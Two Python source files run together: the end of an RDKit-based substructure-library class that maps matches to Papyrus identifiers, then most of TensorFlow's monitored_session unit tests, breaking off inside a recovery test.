ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
return data
class SubstructureLibrary(SubstructLibrary):
def __init__(self, fp_file_name):
"""Extenstion of RDKIT's rdSubstructLibrary to support mappings.
:param fp_file_name: file containing the molecular mappings of the substructure library
"""
super(SubstructureLibrary, self).__init__()
self.lib = SubstructLibrary(CachedMolHolder(), PatternHolder())
self.fp_filename = fp_file_name
def _get_mapping(self, ids: Union[List[int], int]):
"""Get the Papyrus identifiers corresponding to the given indices"""
if not isinstance(ids, list):
ids = [ids]
if not len(ids):
raise ValueError('indices must be supplied')
for id in ids:
if int(id) != id:
raise ValueError('indices must be integers')
with tb.open_file(self.fp_filename) as fp_file:
if max(ids) > max(fp_file.root.mol_mappings.cols.idnumber):
raise ValueError(f'index not in database: {max(ids)}')
# Get data fields from mol_mappings table
mappings_table = fp_file.root.mol_mappings
colnames = mappings_table.cols._v_colnames
data = []
for id in ids:
pointer = mappings_table.where(f"idnumber == {id}")
try:
data.append(next(pointer).fetch_all_fields())
except StopIteration:
raise ValueError(f'could not find index {id}')
data = pd.DataFrame.from_records(data, columns=colnames)
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def GetMatches(self, query: Union[str, Chem.Mol], recursionPossible: bool=True, useChirality: bool=True,
useQueryQueryMatches: bool=False, numThreads: int=-1, maxResults: int=-1):
if isinstance(query, str):
query = load_molecule(query)
ids = list(super(SubstructureLibrary, self).GetMatches(query=query,
recursionPossible=recursionPossible,
useChirality=useChirality,
useQueryQueryMatches=useQueryQueryMatches,
numThreads=numThreads,
maxResults=maxResults))
return self._get_mapping(ids)
def substructure(self, query: Union[str, Chem.Mol]):
return self.GetMatches(query)
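# End-to-end sketch of a substructure query (comments only; `fpss` is assumed to be a
# loaded FPSubSim2 instance and the query is an arbitrary pyridine substructure):
#     sub_lib = fpss.get_substructure_lib()
#     matches = sub_lib.GetMatches('c1ccncc1')
#     # -> DataFrame with the idnumber / connectivity / InChIKey of matching molecules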
|
monitored_session_test.py
|
# pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import sys
import threading
import time
import traceback
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
def latest_summaries(base_dir):
"""Parse summary events from latest event file in base_dir."""
file_paths = glob.glob(os.path.join(base_dir, 'events.*'))
file_path = sorted(file_paths)[-1] if file_paths else None
latest_events = summary_io.summary_iterator(file_path) if file_path else []
return [e for e in latest_events if e.HasField('summary')]
class ScaffoldTest(test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.ready_for_local_init_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
variables.VariableV1(1, name='my_var')
variables.VariableV1(
2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertEqual(None, scaffold.local_init_feed_dict)
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
with self.cached_session() as sess:
self.assertItemsEqual([b'my_var', b'my_local_var'],
sess.run(scaffold.ready_op))
self.assertItemsEqual([b'my_var'],
sess.run(scaffold.ready_for_local_init_op))
sess.run(scaffold.init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
sess.run(scaffold.local_init_op)
self.assertEqual(0, len(sess.run(scaffold.ready_op)))
def test_defaults_no_variables(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
constant_op.constant(1, name='my_const')
scaffold.finalize()
self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
self.assertEqual(None, scaffold.local_init_feed_dict)
self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
def test_caches_values(self):
with ops.Graph().as_default():
variables.VariableV1([1])
scaffold1 = monitored_session.Scaffold()
scaffold1.finalize()
scaffold2 = monitored_session.Scaffold()
scaffold2.finalize()
self.assertEqual(scaffold1.init_op, scaffold2.init_op)
self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
self.assertEqual(scaffold1.ready_for_local_init_op,
scaffold2.ready_for_local_init_op)
self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
self.assertEqual(scaffold1.saver, scaffold2.saver)
def test_raise_error_if_more_than_one_cached_item(self):
with ops.Graph().as_default():
variables.VariableV1([1])
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
with self.assertRaisesRegex(RuntimeError, 'More than one item'):
monitored_session.Scaffold().finalize()
def test_uses_passed_values(self):
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver)
scaffold.finalize()
self.assertEqual(2, scaffold.init_op)
self.assertEqual(3, scaffold.init_feed_dict)
self.assertTrue(callable(scaffold.init_fn))
self.assertEqual(5, scaffold.ready_op)
self.assertEqual(6, scaffold.ready_for_local_init_op)
self.assertEqual(7, scaffold.local_init_op)
self.assertEqual(8, scaffold.local_init_feed_dict)
self.assertEqual(saver, scaffold.saver)
def test_graph_is_finalized(self):
with ops.Graph().as_default():
variables.VariableV1([1])
monitored_session.Scaffold().finalize()
with self.assertRaisesRegex(RuntimeError,
'Graph is finalized and cannot be modified'):
constant_op.constant([0])
def test_new_scaffold_from_default_scaffold(self):
scaffold1 = monitored_session.Scaffold()
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold2 = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver,
copy_from_scaffold=scaffold1)
scaffold2.finalize()
self.assertEqual(2, scaffold2.init_op)
self.assertEqual(3, scaffold2.init_feed_dict)
self.assertTrue(callable(scaffold2.init_fn))
self.assertEqual(5, scaffold2.ready_op)
self.assertEqual(6, scaffold2.ready_for_local_init_op)
self.assertEqual(7, scaffold2.local_init_op)
self.assertEqual(8, scaffold2.local_init_feed_dict)
self.assertEqual(saver, scaffold2.saver)
def test_new_scaffold_from_existing_scaffold(self):
with ops.Graph().as_default():
variables.VariableV1([1])
saver = saver_lib.Saver()
scaffold1 = monitored_session.Scaffold(
init_op=2,
init_feed_dict=3,
init_fn=lambda scaffold, sess: 4,
ready_op=5,
ready_for_local_init_op=6,
local_init_op=7,
local_init_feed_dict=8,
saver=saver)
scaffold2 = monitored_session.Scaffold(
init_op=4,
init_feed_dict=6,
init_fn=lambda scaffold, sess: 8,
ready_op=10,
ready_for_local_init_op=12,
local_init_op=14,
local_init_feed_dict=15,
saver=saver,
copy_from_scaffold=scaffold1)
scaffold2.finalize()
self.assertEqual(4, scaffold2.init_op)
self.assertEqual(6, scaffold2.init_feed_dict)
self.assertTrue(callable(scaffold2.init_fn))
self.assertEqual(10, scaffold2.ready_op)
self.assertEqual(12, scaffold2.ready_for_local_init_op)
self.assertEqual(14, scaffold2.local_init_op)
self.assertEqual(15, scaffold2.local_init_feed_dict)
self.assertEqual(saver, scaffold2.saver)
def test_copy_from_scaffold_is_scaffold(self):
with ops.Graph().as_default():
with self.assertRaisesRegex(
TypeError, 'copy_from_scaffold is not a Scaffold instance'):
monitored_session.Scaffold(copy_from_scaffold=1)
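# Outside of these tests, a Scaffold is typically handed to a monitored session, roughly as
# follows (`my_init_fn` and `train_op` are placeholders for user-defined objects):
#     scaffold = monitored_session.Scaffold(init_fn=my_init_fn)
#     with monitored_session.MonitoredTrainingSession(scaffold=scaffold) as sess:
#       sess.run(train_op)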
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
def __init__(self):
self.should_stop = False
self.request = None
self.call_counter = collections.Counter()
self.last_run_context = None
self.last_run_values = None
def begin(self):
self.call_counter['begin'] += 1
def after_create_session(self, session, coord): # pylint: disable=unused-argument
self.call_counter['after_create_session'] += 1
def before_run(self, run_context):
self.call_counter['before_run'] += 1
self.last_run_context = run_context
return self.request
def after_run(self, run_context, run_values):
self.call_counter['after_run'] += 1
self.last_run_values = run_values
if self.should_stop:
run_context.request_stop()
def end(self, session):
self.call_counter['end'] += 1
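# FakeHook mirrors the SessionRunHook contract exercised by these tests; in real code a
# hook is attached to a monitored session roughly as follows (`some_op` is a placeholder):
#     hook = FakeHook()
#     hook.request = session_run_hook.SessionRunArgs(some_op)
#     with monitored_session.MonitoredSession(hooks=[hook]) as sess:
#       sess.run(some_op)  # begin/before_run/after_run counters get updated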
class MonitoredTrainingSessionTest(test.TestCase):
"""Tests MonitoredTrainingSession."""
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(2, session.run(gstep))
def test_save_checkpoint_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(100, session.run(gstep))
def test_save_checkpoint_secs(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_secs')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_secs=0.1,
log_step_count_steps=10) as session:
session.run(new_gstep)
time.sleep(0.2)
for _ in range(10):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(11, session.run(gstep))
def test_summaries_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_summaries_secs(self):
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_secs')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_summaries_steps=None,
save_summaries_secs=0.1,
log_step_count_steps=10) as session:
session.run(new_gstep)
time.sleep(0.2)
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_custom_saving(self):
logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
fake_hook = FakeHook()
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
chief_only_hooks=[fake_hook],
save_checkpoint_secs=0) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# Check whether custom hook called or not
self.assertEqual(1, fake_hook.call_counter['begin'])
# A restart will not find the checkpoint, since we didn't save.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(0, session.run(gstep))
def test_save_graph_def(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=1,
save_graph_def=True) as session:
self.assertIn('graph.pbtxt', os.listdir(logdir))
self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 1)
session.run(new_gstep)
self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 2)
def test_save_graph_def_false(self):
logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with monitored_session.MonitoredTrainingSession(
is_chief=True,
checkpoint_dir=logdir,
save_checkpoint_steps=1,
save_graph_def=False) as session:
self.assertNotIn('graph.pbtxt', os.listdir(logdir))
self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
session.run(new_gstep)
self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
class MockExtended(object):
def __init__(self, between_graph, should_init, should_checkpoint,
should_save_summary):
self.experimental_between_graph = between_graph
self.experimental_should_init = should_init
self.should_checkpoint = should_checkpoint
self.should_save_summary = should_save_summary
class MockStrategy(object):
def __init__(self,
between_graph=False,
should_init=True,
should_checkpoint=None,
should_save_summary=None):
self.extended = MockExtended(between_graph, should_init, should_checkpoint,
should_save_summary)
class MonitoredTrainingSessionWithDistributeCoordinatorTest(test.TestCase):
"""Test distribute coordinator controls summary saving and checkpointing."""
def test_summary_hook_enabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_save_summary=True), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_enabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
summaries = latest_summaries(logdir)
tags = [s.summary.value[0].tag for s in summaries]
self.assertIn('my_summary_tag', tags)
self.assertIn('global_step/sec', tags)
def test_summary_hook_disabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_save_summary=False), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_summaries_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
summary.scalar('my_summary_tag', new_gstep * 2)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_summaries_steps=100,
log_step_count_steps=10) as session:
for _ in range(101):
session.run(new_gstep)
# No summary is saved.
summaries = latest_summaries(logdir)
self.assertEqual(len(summaries), 0)
def test_checkpoint_hook_enabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_checkpoint=True), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_enabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(100, session.run(gstep))
def test_checkpoint_hook_disabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_checkpoint=False), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# No checkpoint is saved.
checkpoint = checkpoint_management.latest_checkpoint(logdir)
self.assertIsNone(checkpoint)
def test_checkpoint_hook_enable_on_non_chief_with_collective_ops(self):
strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy()
strategy.extended._is_chief = False
context = distribute_coordinator._WorkerContext(strategy, None, 'worker', 1)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# No checkpoint is saved.
checkpoint = checkpoint_management.latest_checkpoint(logdir)
self.assertIsNone(checkpoint)
# But saved to a temporary directory.
checkpoint = checkpoint_management.latest_checkpoint(
os.path.join(logdir, 'tmp_worker_1'))
self.assertIsNotNone(checkpoint)
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(test.TestCase):
"""_WrappedSession tests."""
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(sess.graph, wrapped_sess.graph)
self.assertEqual(sess.sess_str, wrapped_sess.sess_str)
@test_util.run_deprecated_v1
def test_should_stop_on_close(self):
with self.cached_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_uses_check_stop(self):
with self.cached_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_delegates_to_wrapped_session(self):
with self.cached_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
@test_util.run_deprecated_v1
def test_close_twice(self):
with self.cached_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
"""_CoordinatedSession tests."""
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(sess.graph, coord_sess.graph)
self.assertEqual(sess.sess_str, coord_sess.sess_str)
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
@test_util.run_deprecated_v1
def test_should_stop_on_close(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_on_coord_stop(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegex(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_stop_threads_on_close_after_exception(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegex(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_propagates_exception_trace(self):
assertion = control_flow_ops.Assert(False, ['This should fail.'])
with self.cached_session() as sess:
coord = coordinator.Coordinator(clean_stop_exception_types=())
coord_sess = monitored_session._CoordinatedSession(sess, coord)
try:
coord_sess.run([assertion])
self.fail('No exception was raised by assertion.')
except errors_impl.InvalidArgumentError:
# Extract the name of the file where the exception was first raised.
_, _, exc_traceback = sys.exc_info()
tb = traceback.extract_tb(exc_traceback)
exc_source_file = tb[-1][0]
exc_source_basename = os.path.basename(exc_source_file)
# If it's monitored_session.py then the original stack trace was not
# correctly propagated.
self.assertIn(
exc_source_basename, ['session.py', 'monitored_session.py'],
'The exception was raised from an unrecognized file. This unit '
'test probably needs to be updated. Traceback:\n%s\n' % tb)
self.assertEqual(
exc_source_basename, 'session.py',
'Original stack trace was not propagated by MonitoredSession. '
'Traceback:\n%s' % tb)
class AbortAtNSession(object):
"""A mock session that aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
      raise errors_impl.AbortedError(None, None, 'Aborted at N')
self._count -= 1
return self._sess.run(*args, **kwargs)
class StopCoordinatorWithException(session_run_hook.SessionRunHook):
"""With this hook Coordinator throws an exception after N-runs."""
def __init__(self, calls_before_stopping, exception_to_raise=None):
self._started_the_side_thread_already = False
self._lock = threading.Lock()
self._stored_exception_event = threading.Event()
self._calls_before_stopping = calls_before_stopping
self._exception_to_raise = (exception_to_raise or errors_impl.AbortedError(
None, None, 'Aborted at N'))
def _maybe_stop_with_exception(self, coord):
while True:
with self._lock:
if self._calls_before_stopping == 0:
try:
raise self._exception_to_raise
except Exception as e: # pylint: disable=broad-except
coord.request_stop(e)
self._stored_exception_event.set()
break
def after_create_session(self, session, coord):
if self._started_the_side_thread_already:
return
separate_thread = threading.Thread(
target=self._maybe_stop_with_exception, args=(coord,))
coord.register_thread(separate_thread)
separate_thread.start()
self._started_the_side_thread_already = True
# Coordinator will take care of joining `separate_thread`.
def after_run(self, run_context, run_values):
stopping_now = False
with self._lock:
self._calls_before_stopping -= 1
if self._calls_before_stopping == 0:
stopping_now = True
if stopping_now:
self._stored_exception_event.wait()
class FailTrainingAfterCoordinatorStopped(StopCoordinatorWithException):
"""With this hook training encounters an exception after N-runs."""
def __init__(self, calls_before_stopping):
StopCoordinatorWithException.__init__(self, calls_before_stopping)
self._coord = None
def after_create_session(self, session, coord):
self._coord = coord
return StopCoordinatorWithException.after_create_session(
self, session, coord)
def after_run(self, run_context, run_values):
StopCoordinatorWithException.after_run(self, run_context, run_values)
try:
# After a `run`, an exception could have been stored inside the
# coordinator.
self._coord.raise_requested_exception()
except errors_impl.AbortedError:
      # In the real world, the main thread may or may not know about the exception
# that stopped the coordinator. Because the coordinator has stopped, the
# main thread could have gotten stuck as well (for example, the
# coordinator was supposed to execute `FIFOQueue.enqueue` while the main
# thread is executing a blocking `FIFOQueue.dequeue`). After it got stuck,
# the session is going to get garbage collected after some time with:
raise errors_impl.CancelledError(None, None,
'Session got garbage-collected.')
class CountingSessionCreator(object):
"""A creator that counts the number of created sessions."""
def __init__(self, session):
self._initial_session = session
# We only have one session per test case. We can't re-create it, thus
# it shouldn't be closed.
self._initial_session.close = lambda *args: None
self._create_session_calls = 0
@property
def number_of_sessions_created(self):
return self._create_session_calls
def create_session(self):
self._create_session_calls += 1
return self._initial_session
class RecoverableSessionTest(test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(sess.graph, recoverable_sess.graph)
self.assertEqual(sess.sess_str, recoverable_sess.sess_str)
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
@test_util.run_deprecated_v1
def test_recovery(self):
with self.cached_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
